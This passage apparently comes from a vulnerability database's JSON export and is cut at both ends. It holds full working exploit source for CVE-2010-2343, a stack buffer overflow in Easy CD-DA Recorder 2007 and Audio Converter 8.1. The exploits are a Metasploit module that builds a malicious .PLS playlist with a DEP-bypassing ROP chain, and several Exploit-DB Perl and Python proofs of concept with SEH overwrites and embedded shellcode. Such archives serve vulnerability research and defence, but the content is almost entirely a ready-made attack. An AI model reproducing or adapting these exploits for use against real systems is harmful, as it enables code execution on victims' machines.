'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack-based buffer overflow vulnerability in \nEasy CD-DA Recorder 2007, caused by a long string in a playlist entry. \nBy persuading the victim to open a specially-crafted .PLS file, a \nremote attacker could execute arbitrary code on the system or cause \nthe application to crash. This module has been tested successfully on \nWindows XP SP3 and Windows 7 SP1. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'chap0', # Vulnerability discovery and original exploit \n'Gabor Seljan', # Metasploit module \n'juan vazquez' # Improved reliability \n], \n'References' => \n[ \n[ 'BID', '40631' ], \n[ 'EDB', '13761' ], \n[ 'OSVDB', '65256' ], \n[ 'CVE', '2010-2343' ], \n[ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ] \n], \n'DefaultOptions' => \n{ \n'ExitFunction' => 'process' \n}, \n'Platform' => 'win', \n'Payload' => \n{ \n'DisableNops' => true, \n'BadChars' => \"\\x0a\\x3d\", \n'Space' => 2454, \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # ADD ESP,-3500 \n}, \n'Targets' => \n[ \n[ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)', \n# easycdda.exe 3.0.114.0 \n# audconv.dll 7.0.815.0 \n{ \n'Offset' => 1108, \n'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll] \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jun 7 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ false, 'The file name.', 'msf.pls']) \n], \nself.class) \n \nend \n \ndef nops \nreturn make_nops(4).unpack(\"V\").first \nend \n \ndef rop_nops(n = 1) \n# RETN (ROP NOP) [audconv.dll] \n[0x1003d55d].pack('V') * n \nend \n \ndef exploit \n \n# ROP chain generated by mona.py - See corelan.be \nrop_gadgets = \n[ \n0x1007261e, # POP EDX # RETN [audconv.dll] \n0x0042a0e0, # &VirtualProtect() [IAT easycdda.exe] \n0x1003bd6b, # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll] \n0x10035802, # XCHG EAX,ESI # RETN [audconv.dll] \n0x1005d288, # POP EBP # RETN [audconv.dll] \n0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe] \n0x1005cc2d, # POP EBX # RETN [audconv.dll] \n0x00000996, # 0x00000996-> EBX \n0x1008740c, # POP EDX # RETN [audconv.dll] \n0x00000040, # 0x00000040-> EDX \n0x1001826d, # POP ECX # RETN [audconv.dll] \n0x004364c6, # &Writable location [easycdda.exe] \n0x00404aa9, # POP EDI # RETN [easycdda.exe] \n0x100378e6, # RETN (ROP NOP) [audconv.dll] \n0x0042527d, # POP EAX # RETN [easycdda.exe] \nnops, \n0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe] \n].flatten.pack('V*') \n \nsploit = rop_nops(target['Offset'] / 4) \nsploit << [0x1003d55c].pack(\"V\") # pop edi # ret [audconv.dll] \nsploit << [target.ret].pack(\"V\") \nsploit << rop_nops(22) \nsploit << rop_gadgets \nsploit << payload.encoded \nsploit << rand_text_alpha_upper(10000) # Generate exception \n \n# Create the file \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \nfile_create(sploit) \n \nend \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125195/easycdda_pls_bof.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T15:08:55", "bulletinFamily": "exploit", "description": "Easy CD-DA Recorder - (PLS File) Buffer Overflow. CVE-2010-2343. Local exploit for windows platform", "modified": "2014-02-13T00:00:00", "published": "2014-02-13T00:00:00", "id": "EDB-ID:31643", "href": "https://www.exploit-db.com/exploits/31643/", "type": "exploitdb", "title": "Easy CD-DA Recorder - PLS File Buffer Overflow", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::FILEFORMAT\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a stack-based buffer overflow vulnerability in\r\n Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.\r\n By persuading the victim to open a specially-crafted .PLS file, a\r\n remote attacker could execute arbitrary code on the system or cause\r\n the application to crash. This module has been tested successfully on\r\n Windows XP SP3 and Windows 7 SP1.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'chap0', # Vulnerability discovery and original exploit\r\n 'Gabor Seljan', # Metasploit module\r\n 'juan vazquez' # Improved reliability\r\n ],\r\n 'References' =>\r\n [\r\n [ 'BID', '40631' ],\r\n [ 'EDB', '13761' ],\r\n [ 'OSVDB', '65256' ],\r\n [ 'CVE', '2010-2343' ],\r\n [ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => 'process'\r\n },\r\n 'Platform' => 'win',\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'BadChars' => \"\\x0a\\x3d\",\r\n 'Space' => 2454,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # ADD ESP,-3500\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',\r\n # easycdda.exe 3.0.114.0\r\n # audconv.dll 7.0.815.0\r\n {\r\n 'Offset' => 1108,\r\n 'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jun 7 2010',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls'])\r\n ],\r\n self.class)\r\n\r\n end\r\n\r\n def nops\r\n return make_nops(4).unpack(\"V\").first\r\n end\r\n\r\n def rop_nops(n = 1)\r\n # RETN (ROP NOP) [audconv.dll]\r\n [0x1003d55d].pack('V') * n\r\n end\r\n\r\n def exploit\r\n\r\n # ROP chain generated by mona.py - See corelan.be\r\n rop_gadgets =\r\n [\r\n 0x1007261e, # POP EDX # RETN [audconv.dll]\r\n 0x0042a0e0, # &VirtualProtect() [IAT easycdda.exe]\r\n 0x1003bd6b, # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll]\r\n 0x10035802, # XCHG EAX,ESI # RETN [audconv.dll]\r\n 0x1005d288, # POP EBP # RETN [audconv.dll]\r\n 0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe]\r\n 0x1005cc2d, # POP EBX # RETN [audconv.dll]\r\n 0x00000996, # 0x00000996-> EBX\r\n 0x1008740c, # POP EDX # RETN [audconv.dll]\r\n 0x00000040, # 0x00000040-> EDX\r\n 0x1001826d, # POP ECX # RETN [audconv.dll]\r\n 0x004364c6, # &Writable location [easycdda.exe]\r\n 0x00404aa9, # POP EDI # RETN [easycdda.exe]\r\n 0x100378e6, # RETN (ROP NOP) [audconv.dll]\r\n 0x0042527d, # POP EAX # RETN [easycdda.exe]\r\n nops,\r\n 0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]\r\n ].flatten.pack('V*')\r\n\r\n sploit = rop_nops(target['Offset'] / 4)\r\n sploit << [0x1003d55c].pack(\"V\") # pop edi # ret [audconv.dll]\r\n sploit << [target.ret].pack(\"V\")\r\n sploit << rop_nops(22)\r\n sploit << rop_gadgets\r\n sploit << payload.encoded\r\n sploit << rand_text_alpha_upper(10000) # Generate exception\r\n\r\n # Create the file\r\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n file_create(sploit)\r\n\r\n end\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/31643/"}, {"lastseen": "2016-02-01T18:25:48", "bulletinFamily": "exploit", "description": "Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ROP/WPM. CVE-2010-2343. Local exploit for windows platform", "modified": "2010-06-07T00:00:00", "published": "2010-06-07T00:00:00", "id": "EDB-ID:13763", "href": "https://www.exploit-db.com/exploits/13763/", "type": "exploitdb", "title": "Audio Converter 8.1 - Stack Buffer Overflow PoC Exploit ROP/WPM 0day", "sourceData": "#***********************************************************************************\r\n# Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ROP/WPM\r\n# Date : 07/06/2010\r\n# Author : Sud0\r\n# Bug found by : chap0\r\n# Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html\r\n# Version : 8.1\r\n# OS : Windows\r\n# Tested on : XP SP3 En (VirtualBox)\r\n# Type of vuln : SEH\r\n# Thanks to my wife for her support\r\n# Thanks for chap0 for bringing us the game\r\n# Greetz to: Corelan Security Team\r\n# mr_me you'r killing the ROP bro :)\r\n# http://www.corelan.be:8800/index.php/security/corelan-team-members/\r\n# Using ROP to bypass DEP protection and call WPM\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n# Script provided 'as is', without any warranty.\r\n# Use for educational purposes only.\r\n# Do not use this code to do anything illegal !\r\n# Corelan does not want anyone to use this script\r\n# for malicious and/or illegal purposes\r\n# Corelan cannot be held responsible for any illegal use.\r\n#\r\n# Note : you are not allowed to edit/modify this code. \r\n# If you do, Corelan cannot be held responsible for any damages this may cause.\r\n#***********************************************************************************\r\n#code :\r\nprint \"|------------------------------------------------------------------|\\n\";\r\nprint \"| __ __ |\\n\";\r\nprint \"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\\n\";\r\nprint \"| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |\\n\";\r\nprint \"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\\n\";\r\nprint \"| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |\\n\";\r\nprint \"| |\\n\";\r\nprint \"| http://www.corelan.be:8800 |\\n\";\r\nprint \"| |\\n\";\r\nprint \"|-------------------------------------------------[ EIP Hunters ]--|\\n\\n\";\r\nprint \"[+] Exploit for .... \\n\";\r\n\r\nmy $filename=\"newaudio.pls\";\r\n# Small Shellcode to run calc\r\nmy $shellcode = \"\\x8B\\xEC\\x55\\x8B\\xEC\\x68\\x20\\x20\\x20\\x2F\\x68\\x63\\x61\\x6C\\x63\\x8D\\x45\\xF8\\x50\\xB8\\xC7\\x93\\xC2\\x77\\xFF\\xD0\";\r\n\r\nmy \t$buffer = \"A\" x 280; \t\t\t# some junk\r\n\t$buffer .= \"\\x31\\x2A\\x00\\x10\"; \t\t# mov eax,ebp / pop ebp / retn4\r\n\t$buffer .= \"B\" x 12; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t# add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 8;\t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t\r\n\t$buffer .= \"\\x00\\x8D\\x00\\x10\"; \t\t# POP EDI / RETN\r\n\t$buffer .= \"\\xB6\\x12\\x00\\x10\"; \t\t# ADD ESP,4 / RETN\r\n\t$buffer .= \"\\x05\\x21\\x00\\x10\"; \t\t# ADD ESP,14 / RETN\r\n\t$buffer .= \"B\" x 20 ; \t\t\t# some junk\r\n\t\r\n\t$buffer .= \"\\x79\\x84\\x02\\x10\"; \t\t# mov dword ptr ss:[esp + 10], eax / call EDI\r\n\t$buffer .= \"\\x13\\x22\\x80\\x7C\"; \t\t# @ of WPM\r\n\t$buffer .= \"\\xFF\\xFF\\xFF\\xFF\"; \t\t# RET after WPM choose one and use it\r\n\t$buffer .= \"\\xFF\\xFF\\xFF\\xFF\"; \t\t# -1 : means process itself\r\n\t$buffer .= \"\\xCF\\x22\\x80\\x7C\"; \t\t# Destination address\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk, @ of shellcode will land here\r\n\t$buffer .= \"\\x1A\\x00\\x00\\x00\"; \t\t# size of shellcode \r\n\t$buffer .= \"\\x00\\xA0\\x45\\x00\"; \t\t# Writeable memory \r\n\t$buffer .= \"B\" x 12;\t\t\t# some junk\r\n\t$buffer .= $shellcode;\r\n\r\n\t$buffer .= \"B\" x (4436 -length($buffer)); \t\t# some junk\r\n\t$buffer .= \"\\x2F\\x37\\x01\\x10\"; \t\t# SEH : add esp, 878 / retn 8\r\n\t$buffer .= \"A\" x 10000;\t\t\t# some junk\r\n\r\nprint \"Removing old $filename file\\n\";\r\nsystem(\"del $filename\");\r\nprint \"Creating new $filename file\\n\";\r\nopen(FILE, \">$filename\");\r\n\r\nprint FILE $buffer;\r\nclose(FILE);\r\n\r\n\r\n\r\n\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/13763/"}, {"lastseen": "2016-02-01T18:25:34", "bulletinFamily": "exploit", "description": "Easy CD-DA Recorder 2007 SEH Buffer Overflow. CVE-2010-2343. Local exploit for windows platform", "modified": "2010-06-07T00:00:00", "published": "2010-06-07T00:00:00", "id": "EDB-ID:13761", "href": "https://www.exploit-db.com/exploits/13761/", "type": "exploitdb", "title": "Easy CD-DA Recorder 2007 SEH Buffer Overflow", "sourceData": "# Exploit Title : Easy CD-DA Recorder 2007 SEH Buffer Overflow \r\n# Date : June 7, 2010\r\n# Author : chap0 [http://www.seek-truth.net]\r\n# Software Link : http://download.cnet.com/Easy-CD-DA-Recorder/3000-2646_4-10059726.html\r\n# Tested on : Windows XP SP3 En\r\n# Type of vuln : SEH\r\n# Greetz to : Corelan Security Team\r\n# The Crew\t\t: http://www.corelan.be:8800/index.php/security/corelan-team-members/\r\n# Advisory\t\t: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048\r\n# --------------------------------------------------------------------------------------\r\n# Script provided 'as is', without any warranty.\r\n# Use for educational purposes only.\r\n# Do not use this code to do anything illegal !\r\n# Corelan does not want anyone to use this script\r\n# for malicious and/or illegal purposes\r\n# Corelan cannot be held responsible for any illegal use.\r\n#\r\n# Note : you are not allowed to edit/modify this code. \r\n# If you do, Corelan cannot be held responsible for any damages this may cause.\r\n#\r\n# Code :\r\nprint \"|------------------------------------------------------------------|\\n\";\r\nprint \"| __ __ |\\n\";\r\nprint \"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\\n\";\r\nprint \"| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |\\n\";\r\nprint \"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\\n\";\r\nprint \"| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |\\n\";\r\nprint \"| |\\n\";\r\nprint \"| http://www.corelan.be:8800 |\\n\";\r\nprint \"| |\\n\";\r\nprint \"|-------------------------------------------------[ EIP Hunters ]--|\\n\\n\";\r\nprint \"[+] Exploit for Easy CD-DA Recorder \\n\";\r\nprint \"[+] Preparing payload\\n\";\r\nsleep(1);\r\nmy $junk=\"\\x41\" x 1108;\r\n\r\nmy $nseh=\"\\xeb\\x06\\x90\\x90\";\r\n\r\nmy $seh= \"\\x70\\x80\\x08\\x10\"; # ppr 0x10088070 [audconv.dll] \r\n\r\nmy $nops=\"\\x90\" x 24;\r\n\r\nmy $shellcode=\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x54\".\r\n\"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x38\\x45\\x44\\x4e\\x53\\x4b\\x48\\x4e\\x47\".\r\n\"\\x45\\x50\\x4a\\x37\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x44\\x4a\\x51\\x4b\\x38\".\r\n\"\\x4f\\x35\\x42\\x42\\x41\\x50\\x4b\\x4e\\x49\\x54\\x4b\\x38\\x46\\x43\\x4b\\x38\".\r\n\"\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x38\\x42\\x4c\".\r\n\"\\x46\\x47\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\\x44\\x4c\\x4b\\x4e\".\r\n\"\\x46\\x4f\\x4b\\x43\\x46\\x35\\x46\\x42\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x38\".\r\n\"\\x4f\\x45\\x46\\x52\\x41\\x30\\x4b\\x4e\\x48\\x36\\x4b\\x58\\x4e\\x50\\x4b\\x34\".\r\n\"\\x4b\\x58\\x4f\\x35\\x4e\\x51\\x41\\x50\\x4b\\x4e\\x4b\\x38\\x4e\\x31\\x4b\\x48\".\r\n\"\\x41\\x30\\x4b\\x4e\\x49\\x38\\x4e\\x45\\x46\\x32\\x46\\x50\\x43\\x4c\\x41\\x43\".\r\n\"\\x42\\x4c\\x46\\x56\\x4b\\x38\\x42\\x54\\x42\\x53\\x45\\x38\\x42\\x4c\\x4a\\x47\".\r\n\"\\x4e\\x30\\x4b\\x58\\x42\\x34\\x4e\\x30\\x4b\\x38\\x42\\x57\\x4e\\x51\\x4d\\x4a\".\r\n\"\\x4b\\x48\\x4a\\x36\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x48\\x42\\x58\\x42\\x4b\".\r\n\"\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x38\\x4a\\x46\\x4e\\x53\\x4f\\x35\\x41\\x53\".\r\n\"\\x48\\x4f\\x42\\x56\\x48\\x55\\x49\\x48\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x37\".\r\n\"\\x42\\x45\\x4a\\x46\\x42\\x4f\\x4c\\x48\\x46\\x30\\x4f\\x55\\x4a\\x46\\x4a\\x39\".\r\n\"\\x50\\x4f\\x4c\\x48\\x50\\x50\\x47\\x35\\x4f\\x4f\\x47\\x4e\\x43\\x56\\x41\\x56\".\r\n\"\\x4e\\x46\\x43\\x46\\x42\\x30\\x5a\";\r\n\r\n$padding = \"\\x41\" x 10000;\r\n\r\nmy $payload = $junk.$nseh.$seh.$nops.$shellcode.$padding;\r\n\r\nopen (myfile, '>easy.pls');\r\n\r\nprint myfile $payload;\r\n\r\nclose (myfile);\r\n\r\nprint \"[+] Storm the Gates of Hell\\n\"", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/13761/"}, {"lastseen": "2016-02-01T18:25:24", "bulletinFamily": "exploit", "description": "Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit. CVE-2010-2343. Local exploit for windows platform", "modified": "2010-06-07T00:00:00", "published": "2010-06-07T00:00:00", "id": "EDB-ID:13760", "href": "https://www.exploit-db.com/exploits/13760/", "type": "exploitdb", "title": "Audio Converter 8.1 - Stack Buffer Overflow PoC Exploit 0day", "sourceData": "#***********************************************************************************\r\n# Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit\r\n# Date : 16/05/2010\r\n# Author : Sud0\r\n# Bug found by : chap0\r\n# Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html\r\n# Version : 8.1\r\n# OS : Windows\r\n# Tested on : XP SP3 En (VirtualBox)\r\n# Type of vuln : SEH\r\n# Thanks to my wife for her support\r\n# Thanks for chap0 for bringing us the game\r\n# Greetz to: Corelan Security Team\r\n# http://www.corelan.be:8800/index.php/security/corelan-team-members/\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n# Script provided 'as is', without any warranty.\r\n# Use for educational purposes only.\r\n# Do not use this code to do anything illegal !\r\n# Corelan does not want anyone to use this script\r\n# for malicious and/or illegal purposes\r\n# Corelan cannot be held responsible for any illegal use.\r\n#\r\n# Note : you are not allowed to edit/modify this code. \r\n# If you do, Corelan cannot be held responsible for any damages this may cause.\r\n#***********************************************************************************\r\n#code :\r\nprint \"|------------------------------------------------------------------|\\n\";\r\nprint \"| __ __ |\\n\";\r\nprint \"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\\n\";\r\nprint \"| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |\\n\";\r\nprint \"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\\n\";\r\nprint \"| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |\\n\";\r\nprint \"| |\\n\";\r\nprint \"| http://www.corelan.be:8800 |\\n\";\r\nprint \"| |\\n\";\r\nprint \"|-------------------------------------------------[ EIP Hunters ]--|\\n\\n\";\r\nprint \"[+] Exploit for .... \\n\";\r\n\r\nimport socket\r\n#shellcode running calc.exe alpha2 encoded basereg edx\r\nshell=\"JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIlKXlpUnkxlqx7P7PQ0fOrHpcparLQsLMaUzXPPNXKwOcxBCGKOZpA\" \r\njunk=\"B\" * (4432 - len(shell)) #seh overwritten after 4432 bytes\r\nnseh= \"\\xEB\\x06\\xEB\\x06\" # jmp forward \r\nseh= \"\\xF1\\x8E\\x03\\x10\" # nice ppr from audioconv\r\nalign=\"\\x61\\x61\\x61\\xff\\xE2\" # popad / popad / popad / jmp edx\r\nbuffer= shell + junk + nseh + seh + \"\\x90\" * 20 + align + \"A\"* 10000# added some nops after seh\r\n \r\nmefile = open('poc.pls','w');\r\nmefile.write(buffer);\r\nmefile.close()\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/13760/"}], "metasploit": [{"lastseen": "2019-04-12T20:03:23", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow vulnerability in Easy CD-DA Recorder 2007 caused by an overlong string in a playlist entry. By persuading the victim to open a specially-crafted PLS file, a remote attacker can execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1.", "modified": "2017-07-24T13:26:21", "published": "2014-02-10T19:46:09", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/EASYCDDA_PLS_BOF", "href": "", "type": "metasploit", "title": "Easy CD-DA Recorder PLS Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability in\n Easy CD-DA Recorder 2007 caused by an overlong string in a playlist entry.\n By persuading the victim to open a specially-crafted PLS file, a\n remote attacker can execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows XP SP3 and Windows 7 SP1.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'chap0', # Vulnerability discovery and original exploit\n 'Gabor Seljan', # Metasploit module\n 'juan vazquez' # Improved reliability\n ],\n 'References' =>\n [\n [ 'BID', '40631' ],\n [ 'EDB', '13761' ],\n [ 'OSVDB', '65256' ],\n [ 'CVE', '2010-2343' ],\n [ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'BadChars' => \"\\x0a\\x3d\",\n 'Space' => 2454,\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # ADD ESP,-3500\n },\n 'Targets' =>\n [\n [ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',\n # easycdda.exe 3.0.114.0\n # audconv.dll 7.0.815.0\n {\n 'Offset' => 1108,\n 'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jun 7 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls'])\n ],\n self.class)\n\n end\n\n def nops\n return make_nops(4).unpack(\"V\").first\n end\n\n def rop_nops(n = 1)\n # RETN (ROP NOP) [audconv.dll]\n [0x1003d55d].pack('V') * n\n end\n\n def exploit\n\n # ROP chain generated by mona.py - See corelan.be\n rop_gadgets =\n [\n 0x1007261e, # POP EDX # RETN [audconv.dll]\n 0x0042a0e0, # &VirtualProtect() [IAT easycdda.exe]\n 0x1003bd6b, # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll]\n 0x10035802, # XCHG EAX,ESI # RETN [audconv.dll]\n 0x1005d288, # POP EBP # RETN [audconv.dll]\n 0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe]\n 0x1005cc2d, # POP EBX # RETN [audconv.dll]\n 0x00000996, # 0x00000996-> EBX\n 0x1008740c, # POP EDX # RETN [audconv.dll]\n 0x00000040, # 0x00000040-> EDX\n 0x1001826d, # POP ECX # RETN [audconv.dll]\n 0x004364c6, # &Writable location [easycdda.exe]\n 0x00404aa9, # POP EDI # RETN [easycdda.exe]\n 0x100378e6, # RETN (ROP NOP) [audconv.dll]\n 0x0042527d, # POP EAX # RETN [easycdda.exe]\n nops,\n 0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]\n ].flatten.pack('V*')\n\n sploit = rop_nops(target['Offset'] / 4)\n sploit << [0x1003d55c].pack(\"V\") # pop edi # ret [audconv.dll]\n sploit << [target.ret].pack(\"V\")\n sploit << rop_nops(22)\n sploit << rop_gadgets\n sploit << payload.encoded\n sploit << rand_text_alpha_upper(10000) # Generate exception\n\n # Create the file\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n file_create(sploit)\n\n end\nend\n\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/easycdda_pls_bof.rb"}], "cve": [{"lastseen": "2017-08-17T11:14:51", "bulletinFamily": "NVD", "description": 